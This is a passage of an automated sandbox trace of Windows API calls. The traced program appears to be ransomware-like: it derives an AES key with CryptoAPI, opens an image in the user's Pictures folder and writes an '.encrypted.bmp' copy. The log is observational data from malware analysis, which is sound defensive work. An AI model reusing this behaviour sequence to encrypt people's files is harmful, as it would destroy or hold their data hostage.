lpMsg=0x6aed6c) returned 0 [0039.930] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0039.930] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.930] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.930] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.930] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.930] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.930] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.930] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.930] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.930] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.930] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.930] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.930] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.930] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.930] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.930] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.930] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.931] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.931] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.931] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.931] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0039.931] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.931] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.931] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.931] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.931] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0039.931] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.931] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.931] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.931] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.931] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.931] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0039.931] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.931] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.931] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.931] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.931] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.931] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.932] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.932] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.932] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0039.932] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.932] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.932] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.932] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.932] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.932] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.932] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0039.932] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.932] CryptDestroyHash (hHash=0x7c2240) returned 1 [0039.932] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.932] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.932] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.932] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.932] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.932] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\qzetzxm.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.933] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.933] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0039.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0039.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0039.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0039.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.933] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0039.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0039.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0039.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0039.933] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0039.933] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0039.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0039.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0039.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0039.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0039.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0039.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0039.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0039.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0039.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0039.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0039.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0039.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0039.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0039.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0039.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0039.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0xab0028 [0039.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0039.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0039.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c55e8 [0039.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0028 | out: hHeap=0x770000) returned 1 [0039.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0039.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0039.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0039.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0039.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0039.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0039.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0039.935] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw")) returned 0x10 [0039.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0039.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c55e8 | out: hHeap=0x770000) returned 1 [0039.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0039.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0039.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0039.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0039.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0039.935] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\QZEtzxM.encrypted.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\4hhx5h ujxbt\\a-rptl9rgzl\\eqssafks-mgdt6pjw\\qzetzxm.encrypted.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0039.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0039.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0039.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0039.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.936] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0039.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0039.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0039.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0039.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0039.936] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0039.936] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0039.936] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0039.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0039.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0039.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0039.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0039.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0039.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0039.937] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0039.937] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0039.937] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0039.939] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x23cb, lpOverlapped=0x0) returned 1 [0039.940] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0039.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0039.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x123cb) returned 0xac2018 [0039.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0039.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0039.941] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0039.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0039.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x123cb) returned 0x935008 [0039.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0039.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.943] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0039.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0039.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0039.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0039.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x123cb) returned 0xac2018 [0039.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0039.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xac2018 | out: hHeap=0x770000) returned 1 [0039.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0039.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0039.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0039.944] PeekMessageW (in: 